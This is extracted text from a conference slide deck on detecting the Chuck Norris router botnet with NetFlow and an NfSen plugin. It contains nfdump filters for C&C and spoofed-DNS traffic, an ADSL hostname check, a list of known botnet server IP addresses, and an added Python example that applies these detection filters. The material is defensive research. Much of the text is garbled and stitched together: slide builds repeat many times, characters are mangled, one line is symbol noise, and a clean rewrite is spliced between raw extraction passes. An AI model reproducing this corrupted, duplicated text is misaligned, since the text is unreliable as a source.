cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2)
and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP)
and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP)
and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture

cndetdb.pm gives the detection methods access to the PostgreSQL database, NetFlow data, DNS and the WHOIS db

Detection methods
Telnet scan detection
Botnet distribution sites detection
Botnet C&C centers detection
DNS spoofing attack detection
ADSL string detection
Web Interface: Infected Host Detected
(screenshot of the plugin web interface)
Part V
Conclusion
Detection Plugin and Other Botnets

Botnet Lifecycle Similar for Majority of Botnets
scanning for possible bots
infection of a vulnerable device
bot initialization/update
botnet operation

Botnet Detection Plugin Customization
modular plugin engine
easy modification for detection of other botnets
the detection methods need to be customized
plugin distributed under the BSD license
Conclusion

Network Devices Are Not Protected
Routers, access points, printers, cameras, TVs
No AV software, missing patches and firmware updates
But they should be protected

Experience
NetFlow can monitor all such devices in the network
Discovery of the new Chuck Norris botnet using NetFlow
Developed a specialized NfSen plugin for Chuck Norris botnet detection

Future
Chuck Norris is down but others are coming (e.g. Stuxnet)
We are open to research collaboration
The detection plugin is available at our project site
Thank You For Your Attention

Vojtěch Krmíček, Tomáš Plesník
{vojtec|plesnik}@ics.muni.cz
Project CYBER: http://www.muni.cz/ics/cyber

Detecting Botnets with NetFlow

This material is based upon work supported by the Czech Ministry of Defence under Contract No. OVMASUN200801
Connections to Botnet C&C Center: Phase III

Bot's IRC traffic with the command and control center
Diagram: infected device in the local network connecting to the botnet C&C server, TCP/12000, SYN+ACK flags

NFDUMP detection filter:
(src net local_network) and (dst ip IRC_server) and (dst port 12000) and (proto TCP) and (flags SA and not flag R)

IRC_server: IP address of the attacker's IRC server (botnet C&C center)
DNS Spoofing Attack Detection: Phase IV

Attacker's DNS or OpenDNS Queries
Common DNS requests forwarded to OpenDNS servers
Targeted DNS requests forwarded to the attacker's spoofed DNS

DNS Queries Outside Local Network
Used for phishing attacks
E.g. Facebook or banking sites

Diagram: infected device in the local network querying the OpenDNS server and the spoofed DNS server, UDP/53

NFDUMP detection filter:
(src net local_network) and ((dst ip OpenDNS servers) or (dst ip DNS servers)) and (proto UDP) and (dst port 53)

OpenDNS servers: IP addresses of the common OpenDNS servers
DNS servers: IP addresses of the attacker's spoofed DNS servers
ADSL String Detection

Looking for ADSL String
ADSL string indicates the Chuck Norris botnet
Searching in the victim's hostname or the victim's WHOIS record
Querying the DNS server and parsing the received hostname
Querying the WHOIS database and parsing the received info

Screenshot: lookup output for a detected host containing the adsl string
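The hostname/WHOIS check described above, written out as an added Python example; this is not the plugin's own cndet.pm code. The reverse-DNS and WHOIS lookups are passed in as callables so the example runs offline against constructed tables (the 203.0.113.0/24 addresses, hostnames and WHOIS texts are all made up for the example); live_reverse_dns shows the real PTR lookup, and the choice of WHOIS attributes in WHOIS_KEYS is an assumption of this example, not something the slides specify.

```python
import re
import socket

# Assumption of this example: only descriptive WHOIS attributes (RIPE/ARIN style
# "key: value" lines) count as evidence, so a contact e-mail such as
# noc@adsl-contact.example does not by itself flag the host.
WHOIS_KEYS = {"netname", "descr", "remarks", "org-name", "orgname", "role"}
ADSL_RE = re.compile(r"adsl", re.IGNORECASE)

# Constructed, offline stand-ins for the live reverse-DNS and WHOIS lookups.
RDNS_TABLE = {
    "203.0.113.7": "host-7.adsl.isp.example",
    "203.0.113.8": "srv8.example.org",
    "203.0.113.9": None,                      # no PTR record
}
WHOIS_TABLE = {
    "203.0.113.7": "inetnum: 203.0.113.0 - 203.0.113.255\nnetname: EXAMPLE-NET\n"
                   "e-mail: noc@adsl-contact.example\n",
    "203.0.113.8": "inetnum: 203.0.113.0 - 203.0.113.255\nnetname: EXAMPLE-ADSL-POOL\n"
                   "descr: ADSL customers\n",
    "203.0.113.9": "inetnum: 203.0.113.0 - 203.0.113.255\nnetname: EXAMPLE-HOSTING\n",
}


def table_reverse_dns(ip):
    return RDNS_TABLE.get(ip)


def table_whois(ip):
    return WHOIS_TABLE.get(ip, "")


def live_reverse_dns(ip):
    """Real PTR lookup through the system resolver (needs network access)."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except OSError:
        return None


def parse_whois(text):
    """Yield (key, value) pairs from 'key: value' lines, skipping server comments."""
    for line in text.splitlines():
        if ":" in line and not line.startswith(("%", "#")):
            key, value = line.split(":", 1)
            yield key.strip().lower(), value.strip()


def adsl_evidence(ip, reverse_dns=table_reverse_dns, whois=table_whois):
    """Return the evidence that `ip` is an ADSL host: the PTR hostname when it
    contains "adsl", plus every descriptive WHOIS attribute whose value does.
    An empty list means neither source mentions ADSL."""
    evidence = []
    hostname = reverse_dns(ip)
    if hostname and ADSL_RE.search(hostname):
        evidence.append(("hostname", hostname))
    for key, value in parse_whois(whois(ip)):
        if key in WHOIS_KEYS and ADSL_RE.search(value):
            evidence.append(("whois", f"{key}: {value}"))
    return evidence


def rank_hosts(ips, **lookups):
    """Order hits from the flow-based methods so hosts with ADSL evidence come
    first: the string alone does not prove infection, but together with a
    telnet-scan or C&C hit it points at the device class the botnet targets."""
    scored = [(ip, adsl_evidence(ip, **lookups)) for ip in ips]
    return sorted(scored, key=lambda item: -len(item[1]))


if __name__ == "__main__":
    for ip, evidence in rank_hosts(list(RDNS_TABLE)):
        print(ip, evidence)
```

Matching is case-insensitive because ISPs write the marker as "adsl", "ADSL" or "Adsl" in PTR names and netnames; to run it against live data, pass reverse_dns=live_reverse_dns and a whois callable that returns the raw text of a WHOIS query for the address.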
Detected Chuck Norris Servers

Known IP Addresses
Web server addresses: 87.98.173.190, 87.98.163.86
IRC server addresses: 87.98.173.190, 87.98.163.86
IRC server port: 12000
OpenDNS server addresses: 208.67.222.222, 208.67.220.220
Spoofed DNS server: 87.98.163.86

This data is used in the detection methods by default
IP address updates are published at the project page
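The two nfdump filters from the Phase III (C&C connections) and Phase IV (DNS spoofing queries) slides, re-implemented here as an added Python example over flow records, seeded with the default server addresses from the Detected Chuck Norris Servers slide. This is not the plugin's own cndet.pm code: the six-column record format, the local network 192.0.2.0/24 and the sample flows are constructed for the example, and the split of DNS hits into "spoofed-dns" and "opendns" is this example's own way of expressing the different evidential weight of the two destinations.

```python
import ipaddress
from dataclasses import dataclass

# Default indicator data from the "Detected Chuck Norris Servers" slide.
IRC_SERVERS = {ipaddress.ip_address(a) for a in ("87.98.173.190", "87.98.163.86")}
IRC_PORT = 12000
OPENDNS_SERVERS = {ipaddress.ip_address(a) for a in ("208.67.222.222", "208.67.220.220")}
SPOOFED_DNS_SERVERS = {ipaddress.ip_address("87.98.163.86")}

# Assumption: the monitored range. 192.0.2.0/24 is a documentation prefix
# standing in for the real local_network of the nfdump filters.
LOCAL_NETWORK = ipaddress.ip_network("192.0.2.0/24")


@dataclass(frozen=True)
class Flow:
    """One NetFlow record. `flags` holds the cumulative TCP flags seen on the
    flow's packets, which is what nfdump's `flags` filter keyword tests."""
    src: ipaddress.IPv4Address
    dst: ipaddress.IPv4Address
    proto: str
    sport: int
    dport: int
    flags: frozenset


def parse_flows(text: str) -> list:
    """Parse a constructed, simplified CSV export (src,dst,proto,sport,dport,flags).
    Flags use nfdump's six-character UAPRSF notation, e.g. ".AP.S."; a real
    `nfdump -o csv` export carries many more columns than these six."""
    flows = []
    for line in text.strip().splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        src, dst, proto, sport, dport, flags = (f.strip() for f in line.split(","))
        flows.append(Flow(ipaddress.ip_address(src), ipaddress.ip_address(dst),
                          proto.upper(), int(sport), int(dport),
                          frozenset(flags.replace(".", "").upper())))
    return flows


def is_cnc_connection(f: Flow) -> bool:
    """Phase III filter: (src net local_network) and (dst ip IRC_server) and
    (dst port 12000) and (proto TCP) and (flags SA and not flag R).
    S and A together mean the bot completed the handshake with the C&C server;
    an R would mean the connection was refused or torn down by a reset."""
    return (f.src in LOCAL_NETWORK and f.dst in IRC_SERVERS
            and f.dport == IRC_PORT and f.proto == "TCP"
            and {"S", "A"} <= f.flags and "R" not in f.flags)


def dns_query_kind(f: Flow):
    """Phase IV filter: UDP/53 from the local network to the botnet's resolvers.
    Returns None for a non-matching flow, "spoofed-dns" for a query to the
    attacker's own server (strong evidence) or "opendns" for a query to the
    public OpenDNS resolvers (weaker on its own: unrelated hosts may use them)."""
    if not (f.src in LOCAL_NETWORK and f.proto == "UDP" and f.dport == 53):
        return None
    if f.dst in SPOOFED_DNS_SERVERS:
        return "spoofed-dns"
    if f.dst in OPENDNS_SERVERS:
        return "opendns"
    return None


def run_detection(flows) -> dict:
    """Apply both filters and return the hits per method, in flow order, the
    way a backend module would hand them to the database and reporting layer."""
    cnc = [str(f.src) for f in flows if is_cnc_connection(f)]
    dns = []
    for f in flows:
        kind = dns_query_kind(f)
        if kind is not None:
            dns.append((str(f.src), str(f.dst), kind))
    return {"cnc": cnc, "dns": dns}


# Constructed sample flows, not captured traffic: src,dst,proto,sport,dport,flags
SAMPLE_FLOWS = """
192.0.2.10,87.98.173.190,TCP,41234,12000,.AP.S.
192.0.2.11,87.98.163.86,TCP,41235,12000,....S.
192.0.2.15,87.98.173.190,TCP,41237,12000,.A.RS.
192.0.2.12,87.98.163.86,UDP,51000,53,......
192.0.2.13,208.67.222.222,UDP,51001,53,......
198.51.100.5,87.98.173.190,TCP,41236,12000,.AP.S.
192.0.2.14,198.51.100.53,UDP,51002,53,......
"""

if __name__ == "__main__":
    for method, hits in run_detection(parse_flows(SAMPLE_FLOWS)).items():
        print(method, hits)
```

Two details of the Phase III filter are worth keeping in mind when porting it: nfdump's `flags SA` requires both bits to be set on the flow's cumulative flags, so a bot whose C&C server is unreachable (SYN-only flows, like 192.0.2.11 above) or refused (reset, like 192.0.2.15) is deliberately not reported as a live C&C connection; a separate view of such connection attempts is useful after a takedown, when the servers are gone but the bots keep trying.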
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
